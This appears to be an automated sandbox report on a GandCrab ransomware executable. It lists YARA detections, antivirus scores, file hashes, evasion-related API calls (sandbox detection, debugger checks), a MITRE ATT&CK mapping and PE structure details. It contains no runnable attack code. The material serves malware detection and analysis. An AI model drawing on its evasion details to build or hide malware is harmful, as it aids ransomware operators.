Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 244
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00931E5B0_2_00931E5B
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009398E10_2_009398E1
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_0093A84D0_2_0093A84D
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009386740_2_00938674
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00937B900_2_00937B90
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009369EC0_2_009369EC
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009381020_2_00938102
                    Source: vy3mvlAaCZ.exeVirustotal: Detection: 85%
                    Source: vy3mvlAaCZ.exeMetadefender: Detection: 74%
                    Source: vy3mvlAaCZ.exeReversingLabs: Detection: 96%
                    Source: vy3mvlAaCZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\vy3mvlAaCZ.exe "C:\Users\user\Desktop\vy3mvlAaCZ.exe"
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 244
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4268
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F6.tmpJump to behavior
                    Source: classification engineClassification label: mal88.rans.evad.winEXE@2/4@0/0
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: vy3mvlAaCZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: Yara match | File source: vy3mvlAaCZ.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.260275699.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: vy3mvlAaCZ.exe PID: 4268, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_00932A35 push ecx; ret 0_2_00932A48
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_0093C790 LoadLibraryA,GetProcAddress
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_00931E5B RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | API coverage: 0.8 %
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | API call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_00934E1A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_00934E1A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_0093C790 LoadLibraryA,GetProcAddress
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_00932041 GetProcessHeap
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_00933387 SetUnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_009333B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_0093C090 DefWindowProcW,RegisterClassExW,_memset,CreateWindowExW,DestroyWindow,DestroyWindow,Sleep,CreateThread,Sleep,DestroyWindow,DestroyWindow,TerminateThread,CreateWindowExW,GetWindowLongW,SetWindowLongW,SetWindowLongW,SetWindowLongW,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,Sleep,DestroyWindow,DestroyWindow,TerminateThread,WaitForSingleObject
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_00932D1C cpuid
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_0093BA30 Sleep,Sleep,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetVersionExW,GetModuleHandleA,IsWow64Process,GetModuleHandleA,GetModuleHandleA,RegisterClassExW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateThread,Sleep,TerminateThread,Sleep,keybd_event,keybd_event,keybd_event
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exe | Code function: 0_2_00932881 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

                    MITRE ATT&CK Matrix (listed per tactic column; the number in parentheses is the report's per-technique count)

                    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
                    Execution: Native API (1), Scheduled Task/Job, At (Linux), At (Windows), Cron
                    Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
                    Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
                    Defense Evasion: Virtualization/Sandbox Evasion (11), Software Packing (1), Process Injection (1), Obfuscated Files or Information (1), Software Packing
                    Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
                    Discovery: System Time Discovery (1), Security Software Discovery (14), Virtualization/Sandbox Evasion (11), System Information Discovery (13), Remote System Discovery (1)
                    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
                    Collection: Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
                    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
                    Command and Control: Encrypted Channel (1), Junk Data, Steganography, Protocol Impersonation, Fallback Channels
                    Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
                    Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings
                    Impact: Modify System Partition, Device Lockout, Delete Device Data
                    Source | Detection | Scanner | Label
                    vy3mvlAaCZ.exe | 86% | Virustotal |
                    vy3mvlAaCZ.exe | 74% | Metadefender |
                    vy3mvlAaCZ.exe | 96% | ReversingLabs | Win32.Ransomware.GandCrab
                    vy3mvlAaCZ.exe | 100% | Avira | TR/Crypt.EPACK.Gen2
                    vy3mvlAaCZ.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    0.2.vy3mvlAaCZ.exe.930000.0.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
                    0.0.vy3mvlAaCZ.exe.930000.2.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
                    0.0.vy3mvlAaCZ.exe.930000.0.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
                    0.0.vy3mvlAaCZ.exe.930000.4.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    No contacted IP infos
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:694561
                    Start date and time:2022-08-31 23:58:21 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 58s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:vy3mvlAaCZ.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Run name:Run with higher sleep bypass
                    Number of new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal88.rans.evad.winEXE@2/4@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 100% (good quality ratio 92.2%)
                    • Quality average: 80.2%
                    • Quality standard deviation: 30.1%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 1
                    • Number of non-executed functions: 28
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Adjust boot time
                    • Enable AMSI
                    • Sleeps bigger than 300000ms are automatically reduced to 1000ms
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 20.189.173.22
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, eudb.ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                    • Not all processes were analyzed, report is missing behavior information
                    No simulations
                    No context
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):0.673804623399491
                    Encrypted:false
                    SSDEEP:96:kbFWtfhs1Dg3fDUpXIQcQvc6QcEDMcw3Db+HbHg/8BRTf3OyWZAXGng5FMTPSkvu:WsKHBUZMXYjuq/u7svIS274Itwl
                    MD5:3BB61DDF965463EDB0AA60D2950DC834
                    SHA1:94BB88E8277D67F9261EFDA7122B5063FAD1C3AD
                    SHA-256:7887FD561BF713404541B56AB5EF8BC9FA9A5F10F72A15C245B2559DE5EBC544
                    SHA-512:5DE44FD2771DFA8145ED27B03416A0C0CDF00C323DE366DCBEE06F5E9108F332400A2D398E82D3B131371CBA1AFE0525E599956951D7DDC63CF626FAED67A27C
                    Malicious:true
                    Reputation:low
                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.6.4.8.9.1.6.6.0.9.7.5.7.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.6.4.8.9.1.6.7.3.4.7.5.7.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.c.0.a.e.5.6.-.9.f.7.f.-.4.1.f.6.-.9.0.f.5.-.b.2.9.c.8.c.2.5.e.5.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.4.1.1.7.9.9.-.7.b.7.6.-.4.e.f.a.-.a.6.8.4.-.4.0.9.b.a.7.f.4.b.c.c.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.y.3.m.v.l.A.a.C.Z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.a.c.-.0.0.0.1.-.0.0.1.a.-.c.7.3.0.-.5.6.5.d.d.0.b.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.9.1.d.d.a.7.1.0.3.b.9.8.a.3.c.9.4.4.5.a.1.1.3.8.3.7.c.b.f.e.9.0.0.0.0.f.f.f.f.!.0.0.0.0.6.f.a.9.0.a.2.2.9.1.4.8.7.5.9.d.1.2.c.6.3.b.e.e.3.4.2.e.5.5.f.a.8.8.7.f.6.9.7.6.!.v.y.3.m.v.l.A.a.C.Z...e.x.e.....T.a.r.g.e.t.A.p.p.
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 14 streams, Thu Sep 1 06:59:26 2022, 0x1205a4 type
                    Category:dropped
                    Size (bytes):35404
                    Entropy (8bit):1.8846641325885034
                    Encrypted:false
                    SSDEEP:96:5P8M8M/mnPXq82qhi7o5g+f0lltRuii8Y6ATZK+TD5iWI3WIX7I2Qej:WUmnP1OGcltMGuK+TmQe
                    MD5:8041C81145A8C17D64471E698F53B7E0
                    SHA1:CB951C6F726CCC535AA77568B26EB0E4AF325116
                    SHA-256:853815B51624678FA302216392D8377C0DEA180C2C2F7590C599123E3297A7C2
                    SHA-512:16FA68013C4DE6C120CDA18E9829AAEE78EC5D01EEF97C2B51AEAD299018473E5D9D023216EFFAA9DCCEE26DB9A3F62CB6519049B1F9EA968C7CB8A40DBC4CC5
                    Malicious:false
                    Reputation:low
                    Preview:MDMP....... .......NX.c....................................................T.......8...........T...............<............................................................................................U...........B......4.......GenuineIntelW...........T...........JX.c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8278
                    Entropy (8bit):3.696981182329922
                    Encrypted:false
                    SSDEEP:192:Rrl7r3GLNiLz6e6Yq0SUZKgmfgdSPvCpr189bGMsfLCm:RrlsNi/6e6YJSUZKgmfgdSdGffP
                    MD5:0E50780F5CD7ECADA812B9172438386E
                    SHA1:CA9FAE7738916E845C90B37DA95C2B06BAB3B294
                    SHA-256:8E4496A05D4373E8EFC1358AA278C11A2639CECF86AD744F8A492B6CBBD9C630
                    SHA-512:31F04CC5C18B86C62A8A621B90CF110E510569C8717C74EEB9BC2CB9B5E99EEFFE2421E93D2A4BEFA9C7C78D21AED74738EC1D031DA07B3BC534837F4F7CA6E8
                    Malicious:false
                    Reputation:low
                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.6.8.<./.P.i.d.>.......
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4563
                    Entropy (8bit):4.442876235276256
                    Encrypted:false
                    SSDEEP:48:cvIwSD8zspJgtWI9qUWgc8sqYji8fm8M4JNWFXhho+q8FCevxEATULMd:uITf7hNgrsqYrJ0hyXevOATULMd
                    MD5:CAF0E5DE2CF8BA7461786631E7875A69
                    SHA1:02194DB299C7DF9D3E170E694DA2DCB9EDE3FB5E
                    SHA-256:333617884EFEDD0428071F30423AB1BE7EBA23F46EE7B32C922B87F79258F534
                    SHA-512:DBF3AC05100C97BDB368DC0094D24B2BE7F1EA0146ABD7B1724CCC0BC6E7FE2B16471AB916314DCCC41226BAC19DCFA1498C2412BE8A160C503A3102EA8102F3
                    Malicious:false
                    Reputation:low
                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1672810" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.497360445509992
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:vy3mvlAaCZ.exe
                    File size:159232
                    MD5:1873a210d41acdef243e921f3810803a
                    SHA1:6fa90a229148759d12c63bee342e55fa887f6976
                    SHA256:34c779bada9918972748153c3f618d6656148748478beec1ec57c7bb5e363593
                    SHA512:2a45638cc994e6e3af3fe3f7ec153235591c5e07893665485a0e564aefce1f9a8d8da9146b1d7eeab45c09f3fb4afa56107467013fe4e490800546827af96676
                    SSDEEP:3072:l5K/B0toL6SNJmlZHQsozTS+SMqqDL2/TrKdcG:lcytw/u1yTS+xqqDL6HKL
                    TLSH:EAF38C1971D1A0B2E4F30976D5B8AF12446DFC111BB07CDB72E61A9E19320E3AE39B53
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..{...(...(...(...(...(..?(...(T.?(...(T..(...(T.>(w..(..M(...(...(...(..:(...(...(...(Rich...(........................PE..L..
                    Icon Hash:00828e8e8686b000
                    Entrypoint:0x401612
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x5AF0C742 [Mon May 7 21:38:10 2018 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:7848011b763d00cd02658995847dd30b
                    Instruction
                    call 00007F3424C7490Fh
                    jmp 00007F3424C73520h
                    cmp ecx, dword ptr [00413050h]
                    jne 00007F3424C736A4h
                    rep ret
                    jmp 00007F3424C74C9Bh
                    int3
                    int3
                    int3
                    int3
                    int3
                    mov ecx, dword ptr [esp+08h]
                    mov eax, dword ptr [esp+04h]
                    push edi
                    push ebx
                    push esi
                    cmp dword ptr [00427E00h], 01h
                    jc 00007F3424C73874h
                    ja 00007F3424C737A3h
                    movzx edx, byte ptr [ecx]
                    mov ebx, edx
                    shl edx, 08h
                    or edx, ebx
                    je 00007F3424C7378Fh
                    movd xmm3, edx
                    pshuflw xmm3, xmm3, 00h
                    movlhps xmm3, xmm3
                    pxor xmm0, xmm0
                    mov esi, ecx
                    or edi, FFFFFFFFh
                    movzx ebx, byte ptr [ecx]
                    add ecx, 01h
                    test ebx, ebx
                    je 00007F3424C736BFh
                    test ecx, 0000000Fh
                    jne 00007F3424C73690h
                    movdqa xmm2, dqword ptr [ecx]
                    pcmpeqb xmm2, xmm0
                    pmovmskb ebx, xmm2
                    test ebx, ebx
                    jne 00007F3424C736A7h
                    mov edi, 0000000Fh
                    movd edx, xmm3
                    mov ebx, 00000FFFh
                    and ebx, eax
                    cmp ebx, 00000FF0h
                    jnbe 00007F3424C736C9h
                    movdqu xmm1, dqword ptr [eax]
                    pxor xmm2, xmm2
                    pcmpeqb xmm2, xmm1
                    pcmpeqb xmm1, xmm3
                    por xmm1, xmm2
                    pmovmskb ebx, xmm1
                    add eax, 10h
                    test ebx, ebx
                    je 00007F3424C73674h
                    bsf ebx, ebx
                    sub eax, 10h
                    add eax, ebx
                    movzx ebx, byte ptr [eax]
                    test ebx, ebx
                    Programming Language:
                    • [C++] VS2013 build 21005
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2013 build 21005
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12164 | 0x50 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2a000 | 0x1120 | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11df8 | 0x40 | .rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0xe000 | 0x17c | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000xc9c70xca00False0.5717435024752475data6.680188843446378IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0xe0000x49d40x4a00False0.4021853885135135data4.712898301860252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
